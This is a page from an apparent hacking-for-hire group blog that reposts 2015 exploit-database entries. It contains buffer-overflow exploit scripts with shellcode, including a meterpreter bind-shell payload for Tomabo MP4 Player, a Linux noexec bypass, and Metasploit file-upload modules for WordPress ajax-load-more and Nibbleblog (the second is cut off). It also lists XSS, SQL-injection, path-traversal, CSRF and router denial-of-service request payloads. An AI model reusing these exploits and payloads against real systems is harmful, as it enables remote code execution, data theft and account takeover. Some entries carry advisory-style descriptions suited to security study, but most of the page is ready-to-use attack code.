Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863178103

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
'''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt


Vendor:
================================
www.blat.net
http://sourceforge.net/projects/blat/


Product:
================================
Blat v2.7.6

blat.exe is a Win32 command line eMail tool
that sends eMail using SMTP or post to usenet using NNTP.


Vulnerability Type:
=====================
Stack Buffer Overflow


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
An older release of blat.exe v2.7.6 is prone to a stack based buffer
overflow when sending
malicious command line arguments, we need to send two arguments first
can be whatever e.g. "AAAA"
then second argument to trigger the buffer overflow and execute
arbitrary code on the victims OS.


Stack dump...


EAX 00000826
ECX 0018E828 ASCII "Blat saw and processed these options, and was
confused by the last one...
 AAAAAAA...
EDX 0008E3C8
EBX 000000E1
ESP 0018F05C ASCII "AAAAA...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141   <-------------- BOOM!

C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)


Exploit code(s):
===============

Python script to exploit...
'''

import struct,os,subprocess


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('<L', 0x776D0115)      #<--- JMP ESP kernel32.dll

payload="A"*2018+eip+"\x90"*20+sc
subprocess.Popen([vulnpgm, "A"*4, payload], shell=False)


'''
Disclosure Timeline:
=========================================================
Oct 14, 2015  : Public Disclosure


Severity Level:
=========================================================
Med


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that
due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security
related information or exploits by the author or elsewhere.

by hyp3rlinx
'''
HireHackking 
# Exploit Title: Linux >= 3.17 noexec bypass with python ctypes and memfd_create
# Date: 2015.10.14
# Exploit Author: soyer
# Version: linux >= 3.17
# Tested on: Ubuntu 15.04 (x86_64)
#
# usage:
#
#   $ ls -la exec_file
#   -rwxr-xr-x 1 soyer soyer 8600 Oct 14 15:04 exec_file
#   $ ./exec_file
#   bash: ./exec_file: Permission denied
#   $ mount |grep $(pwd)
#   tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
#   $ python noexec.py < exec_file
#   Hello world! fprintf=0x400470, stdout=0x7f63a3933740

from ctypes import *
c = CDLL("libc.so.6")
fd = c.syscall(319,"tempmem",0)
c.sendfile(fd,0,0,0x7ffff000)
c.fexecve(fd,byref(c_char_p()),byref(c_char_p()))
print "fexecve failed"
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=486

Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass
Platform: Windows 10 (build 10240), earlier versions do not have the functionality
Class: Security Feature Bypass

Summary:
A mitigation added to Windows 10 to prevent NTFS Mount Reparse Points being created at integrity levels below medium can be bypassed. 

Description:

Windows 10 has added some new mitigations to block the creation or change the behaviour of certain symbolic links when issued by a low integrity/sandboxed process. The presumed aim to to make it harder to abuse these types of tricks to break out of a sandbox. 

In earlier builds on Windows 10 NTFS Mount Reparse Points were blocked outright from a sandboxed process, however in 10240 (what can only be assumed a final build) the check was moved to the kernel in IopXXXControlFile and changed slightly so that sandboxed processes could create some mount points. The check is roughly:

if (RtlIsSandboxedProcess()) {
   if(ControlCode == FSCTL_SET_MOUNT_POINT) {
       if (FsRtlValidateReparsePointBuffer(buffer) && buffer->ReparseTag == TAG_MOUNT_POINT) {
         NTSTATUS status = ZwOpenFile(..., buffer->ReparseTarget, FILE_GENERIC_WRITE, ... , FILE_DIRECTORY_FILE);
        if (!NT_SUCCESS(status)) {
         return status;
       }
   }
}

The kernel is therefore checking that the target of the mount point is a directory and that the current process has write access to the directory. This would sufficiently limit the ability of a sandboxed process to abuse this to write files at a higher privilege. Unfortunately there’s a perhaps unexpected problem with this check, the sandboxed process can redirect the ZwOpenFile call arbitrarily to something it can open for write, yet the original value is set as the mount point. This is because the file open check is being made inside the process which is doing the call which means it honours the user’s device mapping. 

While the sandboxed process cannot change the per-user drive mappings, it can change the process’s device map using NtSetInformationProcess with the ProcessDeviceMap information class. As we can create arbitrary object directories and symbolic links (which while they also have a mitigation it only prevents a higher privilege process following them, which we don’t care about) we can build a completely fake device map which redirects the open to another directory. A good target turns out to be \Device\NamedPipe\ (note the trailing slash) as that can be opened from any privilege level (including Chrome renderer processes) for write access and as a directory. So if we want to set an arbitrary mount point to say \??\c:\somewhere we can build something like:

<UNNAMED>(DIR) -> C:(DIR) -> somewhere(LINK to \Device\NamedPipe\)

If we set the unnamed directory to the process device map we can bypass the check and create the mount point. 

Perhaps from a fix perspective you could query for the opened path and use that to write to the NTFS reparse point rather than using the original value. 

Proof of Concept:

I’ve provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable file’s ACL to low. Ensure you use the correct version for the architecture on Windows, as there seems to be a bug in NtSetInformationProcess which blocks Wow64 apps from setting the process device map. You can compare the operation to the command shell’s mklink tool that will fail to create the mount point at low integrity. The archive password is ‘password’. Follow these steps: 

1) Extract the PoC to a location on a local hard disk which is writable by a normal user.
2) Execute the poc executable file as low integrity passing two arguments, the path to a directory to create (must be somewhere than can be written to as low integrity user such as AppData\Temp\Low) and the arbitrary file path to set the mount point to. For example:
poc.exe c:\users\user\appdata\local\low\abc c:\notreal.

Expected Result:
It shouldn’t be possible to create a mount point pointed at a location not writable by low integrity user

Observed Result:
The mount point is created successfully. 


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38474.zip
HireHackking 
Vantage Point Security Advisory 2015-003
========================================

Title: Multiple Remote Code Execution found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: High
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>

Paper: https://www.exploit-db.com/docs/english/39658-exploiting-buffer-overflows-on-mips-architecture.pdf

Summary:
--------

ZHONE RGW is vulnerable to stack-based buffer overflow attacks due to
the use of unsafe string functions without sufficient input validation
in the httpd binary. Two exploitable conditions were discovered when
requesting a large (7000) character filename ending in .cgi, .tst,
.html, .cmd, .conf, .txt and .wl, in GET or POST requests. Vantage
Point has developed working code execution exploits for these issues.


1. Stack Overflow via HTTP GET Request
---------------------------------------------------------------------------------------

GET /.cmd?AAAA…..AAAA<7000 Characters> HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnvlanadd.html
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive

2. Stack Overflow via HTTP POST Request
---------------------------------------------------------------------------------------

POST /.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438

AAAA…..AAAA<7000 Characters>


Fix Information:
----------------

Upgrade to version S3.1.241


Timeline:
---------
2015/04: Issues reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Requested Update
2015/10: Confirm that all issues has been fixed


About Vantage Point Security:
--------------------

Vantage Point is the leading provider for penetration testing and
security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.

https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
HireHackking 
source: https://www.securityfocus.com/bid/59069/info

Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Todoo Forum 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>
HireHackking 
source: https://www.securityfocus.com/bid/59069/info
 
Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Todoo Forum 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
HireHackking 
source: https://www.securityfocus.com/bid/59278/info

Sosci Survey is prone to following security vulnerabilities:

1. An unauthorized-access vulnerability
2. Multiple cross-site scripting vulnerabilities
3. Multiple HTML-injection vulnerabilities
4. A PHP code-execution vulnerability

Successful exploits may allow an attacker to gain unauthorized access to the affected application, allow attacker-supplied HTML and script code to run in the context of the affected browser, allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or inject and execute arbitrary malicious PHP code in the context of the web server process. 

https://www.example.com/admin/index.php?o=account&a=message.reply&id=[msg_id]
https://www.example.com/admin/index.php?o=panel&a=receiver.edit&id=<script>alert(document.cookie)</script>
HireHackking 
source: https://www.securityfocus.com/bid/59290/info

Matrix42 Service Store is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Service Store 5.3 SP3 (5.33.946.0) is vulnerable; other versions may also be affected. 

https://www.example.com/SPS/Portal/default.aspx?'"--></style></script> 
<script>alert(document.cookie)</script> [XSS]
HireHackking 
source: https://www.securityfocus.com/bid/59298/info

Fork CMS is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 

http://www.example.com/frontend/js.php?module=core&file=../../../../../../../../../../../../../../../../etc/passwd&language=en&m=1339527371
HireHackking 
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
  
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
      'Description'     => %q{
          This module exploits an authenticated file upload vulnerability in Wordpress plugin
ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
          Tested with version v2.7.3. (May work on older versions).
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module
        ],
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'DisclosureDate'  => 'Oct 02 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['ajax-load-more', {}]],
      'DefaultTarget'   => 0
    ))
	
	register_options(
    [
         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class)
  end
  
  def user
    datastore['WP_USER']
  end
  
  def password
    datastore['WP_PASSWORD']
  end
  
  def check
    # Check plugin version
	ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2')
	if ver
	  return Exploit::CheckCode::Appears
	end
	return Exploit::CheckCode::Safe
  end
  
  def exploit
    # Wordpress login
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
    
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })
    
    if res and res.code == 200
      # "alm_admin_nonce":"e58b6d536d"
      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
      wp_nonce = $1
      if wp_nonce
        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
      else
        vprint_error("#{peer} #{res.body}")
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end

    print_status("#{peer} - Trying to upload payload")
    
    # Generate MIME message
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_admin_ajax),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookie
    })
    
    filename = 'default.php'
    if res
      if res.code == 200
        lines = res.body.split("\n")
        if lines.length > 0
          message = lines[lines.length - 1]
          if message.include?('Template Saved Successfully')
            register_files_for_cleanup(filename)
          else
            vprint_error("#{peer} - Unexpected web page content : #{message}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
    
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
HireHackking 
source: https://www.securityfocus.com/bid/59325/info

TP-LINK TL-WR741N and TL-WR741ND routers are prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.

Successful exploits will cause the device to crash, denying service to legitimate users. 

GET http://www.example.com:80/userRpm/DdnsAddRpm.htm?provider=4 HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://www.example.com/userRpm/DdnsAddRpm.htm?provider=4
Authorization: Basic YWRtaW46YWRtaW4=



GET http://www.example.com:80/help/../../root HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://www.example.com/help/
HireHackking 
source: https://www.securityfocus.com/bid/59312/info

D-Link DIR-865L is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.

D-Link DIR-865L firmware version 1.03 is vulnerable; other versions may also be affected. 

<html> <head> <title> D-LINK DIR-865L CSRF</title> <!-- Firmware Version: 1.03 Fri 02 Nov 2012 --> </head> <body> <form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi" enctype="text/plain" method="post"> <input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?> <postxml> <module> <service>DEVICE.ACCOUNT</service> <device> <gw_name>DIR-865L</gw_name> <account> <seqno>1</seqno> <max>2</max> <count>1</count> <entry> <uid>USR-</uid> <name>Admin</name> <usrid/> <password>ISE</password> <group>0</group> <description/> </entry> </account> <group> <seqno/> <max/> <count>0</count> </group> <session> <captcha>0</captcha> <dummy/> <timeout>600</timeout> <maxsession>128</maxsession> <maxauthorized>16</maxauthorized> </session> </device> </module> <module> <service>HTTP.WAN-1</service> <inf> <web>1337</web> <https_rport></https_rport> <stunnel>1</stunnel> <weballow> <hostv4ip/> </weballow> <inbfilter></inbfilter> </inf> </module> <module> <service>HTTP.WAN-2</service> <inf> <web>1337</web> <weballow></weballow> </inf> </module> <module> <service>INBFILTER</service> <acl> <inbfilter> <seqno>1</seqno> <max>24</max> <count>0</count> </inbfilter> </acl> <ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY> <SETCFG>ignore</SETCFG> </module> <module> <service>SHAREPORT</service> <FATLADY>ignore</FATLADY> <ACTIVATE>ignore</ACTIVATE> </module> </postxml>"> </form> <script> function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");}; window.setTimeout(CSRF2,1000) </script> </body> </html>
HireHackking 
source: https://www.securityfocus.com/bid/59322/info

Crafty Syntax Live Help is prone to a remote file-include vulnerability and a path-disclosure vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to obtain sensitive information and compromise the application and the underlying system; other attacks are also possible.

Crafty Syntax Live Help versions 2.x and versions 3.x are vulnerable. 

File-include:

http://www.example.com/path/admin.php?page=[RFI]

Path-disclosure:

http://www.example.com/livehelp/xmlhttp.php
HireHackking 
# Exploit Title: VLC | libvlccore - (.mp3) Stack Overflow
# Date: 18/10/2015
# Exploit Author: Andrea Sindoni
# Software Link: https://www.videolan.org/vlc/index.it.html
# Version: 2.2.1
# Tested on: Windows 7 Professional 64 bits
#
# PoC with MP3: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38485.zip
#

#APP:  vlc.exe
#ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre
#FOLLOWUP_NAME:  MachineOwner
#MODULE_NAME: libvlccore
#IMAGE_NAME:  libvlccore.dll
#FAILURE_ID_HASH_STRING:  um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd
#Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62
#EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
#ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3)
#  ExceptionCode: c00000fd (Stack overflow)
#  ExceptionFlags: 00000000
#NumberParameters: 2
#   Parameter[0]: 0000000000000001
#   Parameter[1]: 0000000025ed2a20
#
#eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001
#eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0         nv up ei pl nz na po nc
#cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
#
#Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62)
#

import eyed3

value = u'B'*6500000

audiofile = eyed3.load("base.mp3")
audiofile.tag.artist = value
audiofile.tag.album = u'andrea'
audiofile.tag.album_artist = u'sindoni'

audiofile.tag.save()
HireHackking 
# Title: Path Traversal Vulnerability
# Product: Belkin Router N150
# Author: Rahul Pratap Singh
# Website: https://0x62626262.wordpress.com
# Contact:
   Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
   Twitter: @0x62626262
# Vendor Homepage: http://www.belkin.com
# Firmware Tested: 1.00.08, 1.00.09
# CVE: 2014-2962

Description:
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
path traversal vulnerability through the built-in web interface. The
webproc cgi
module accepts a getpage parameter which takes an unrestricted file path as
input. The web server runs with root privileges by default, allowing a
malicious attacker to read any file on the system.

A patch was released by Belkin but that is still vulnerable.

POC:
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh

Ref:
https://www.kb.cert.org/vuls/id/774788
https://0x62626262.wordpress.com/category/full-disclosure/
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=547

If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.

A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal".

This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion.

One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38490.zip
HireHackking 
#!/usr/bin/python

#####################################################################
# Exploit Title: Tomabo MP4 Player 3.11.6 SEH Based Stack Overflow  #
# Exploit Author: @yokoacc, @nudragn, @rungga_reksya                #
# Vendor Homepage: http://www.tomabo.com/                           #
# Software Link: http://www.tomabo.com/mp4-player/download.html     #
# Vulnerable App: Attached                                          #
# Version: 3.11.6 (possibility <= 3.11.6)                           #
# Tested on: Windows XP, 7, 8, and 8.1                              #
# Special Thanks to: @OffsecTraining                                #
# Vendor Notification: August 30th, 2015                            #
# Fixed Date: Around September 16th, 2015 (didn't response yet)     #
# Public Disclosure: October 18th, 2015                             #
#####################################################################

# How to: Run the code and open the m3u file with the Vulnerable MP4 Player by Tomabo
# Bad Character = '\x00\x09\x0a\x0b\x0c\x0d\x1a\x20'
# Payload= windows/meterpreter/bind_tcp ; PORT=4444

file ="whatever.m3u"

load = "\x41" * 1028
load += "\xeb\x08\x90\x90"
load += "\xA9\x1C\x40\x00"
load += "\x90" * 16
load += ("\xdb\xde\xbd\xbc\x9e\x98\xd8\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x48\x31\x6f\x18\x03\x6f\x18\x83\xef\x40\x7c\x6d\x24\x50\x03"
"\x8e\xd5\xa0\x64\x06\x30\x91\xa4\x7c\x30\x81\x14\xf6\x14\x2d"
"\xde\x5a\x8d\xa6\x92\x72\xa2\x0f\x18\xa5\x8d\x90\x31\x95\x8c"
"\x12\x48\xca\x6e\x2b\x83\x1f\x6e\x6c\xfe\xd2\x22\x25\x74\x40"
"\xd3\x42\xc0\x59\x58\x18\xc4\xd9\xbd\xe8\xe7\xc8\x13\x63\xbe"
"\xca\x92\xa0\xca\x42\x8d\xa5\xf7\x1d\x26\x1d\x83\x9f\xee\x6c"
"\x6c\x33\xcf\x41\x9f\x4d\x17\x65\x40\x38\x61\x96\xfd\x3b\xb6"
"\xe5\xd9\xce\x2d\x4d\xa9\x69\x8a\x6c\x7e\xef\x59\x62\xcb\x7b"
"\x05\x66\xca\xa8\x3d\x92\x47\x4f\x92\x13\x13\x74\x36\x78\xc7"
"\x15\x6f\x24\xa6\x2a\x6f\x87\x17\x8f\xfb\x25\x43\xa2\xa1\x21"
"\xa0\x8f\x59\xb1\xae\x98\x2a\x83\x71\x33\xa5\xaf\xfa\x9d\x32"
"\xd0\xd0\x5a\xac\x2f\xdb\x9a\xe4\xeb\x8f\xca\x9e\xda\xaf\x80"
"\x5e\xe3\x65\x3c\x57\x42\xd6\x23\x9a\x34\x86\xe3\x35\xdc\xcc"
"\xeb\x6a\xfc\xee\x21\x03\x94\x12\xca\x3d\x38\x9a\x2c\x57\xd0"
"\xca\xe7\xc0\x12\x29\x30\x76\x6d\x1b\x68\x10\x26\x4d\xaf\x1f"
"\xb7\x5b\x87\xb7\x33\x88\x13\xa9\x44\x85\x33\xbe\xd2\x53\xd2"
"\x8d\x43\x63\xff\x64\x83\xf1\x04\x2f\xd4\x6d\x07\x16\x12\x32"
"\xf8\x7d\x29\xfb\x6c\x3e\x45\x04\x61\xbe\x95\x52\xeb\xbe\xfd"
"\x02\x4f\xed\x18\x4d\x5a\x81\xb1\xd8\x65\xf0\x66\x4a\x0e\xfe"
"\x51\xbc\x91\x01\xb4\x3c\xed\xd7\xf0\x4a\x1f\xe4")

load += "\x44" * (1800 - len(load))

writeFile = open (file, "w")
writeFile.write(load)
writeFile.close()
HireHackking 
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'Nibbleblog File Upload Vulnerability',
      'Description'     => %q{
          Nibbleblog contains a flaw that allows a authenticated remote
          attacker to execute arbitrary PHP code. This module was
          tested on version 4.0.3.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'References'      =>
        [
          ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
        ],
      'DisclosureDate'  => 'Sep 01 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['Nibbleblog 4.0.3', {}]],
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
      ], self.class)
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def check
    cookie = do_login(username, password)
    return Exploit::CheckCode::Detected unless cookie

    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
      'cookie'      => cookie,
      'vars_get'    => {
        'controller'  => 'settings',
        'action'      => 'general'
      }
    )

    if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end

  def do_login(user, pass)
    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'admin.php')
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

    session_cookie = res.get_cookies
    vprint_status("#{peer} - Logging in...")
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
      'cookie'      => session_cookie,
      'vars_post'   => {
        'username'  => user,
        'password'  => pass
      }
    )

    return session_cookie if res && res.code == 302 && res.headers['Location']
    nil
  end

  def exploit
    unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check)
      print_error("Target does not appear to be vulnerable.")
      return
    end

    vprint_status("#{peer} - Authenticating using #{username}:#{password}")

    cookie = do_login(username, password)
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
    vprint_good("#{peer} - Authenticated with Nibbleblog.")

    vprint_status("#{peer} - Preparing payload...")
